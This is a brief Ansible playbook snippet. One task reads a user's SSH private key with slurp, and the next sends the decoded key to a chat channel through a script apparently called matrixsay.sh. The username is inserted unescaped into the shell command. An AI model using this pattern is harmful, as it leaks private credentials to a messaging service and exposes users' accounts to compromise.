---
- name: Slurp private key
  slurp:
    src: "{{ (user.home | default('/home/' + username)) + '/.ssh/id_rsa' }}"
  register: result

- name: Send private key
  command: "matrixsay.sh <h3>{{ username }}</h3><pre>{{ result['content'] | b64decode }}</pre>"

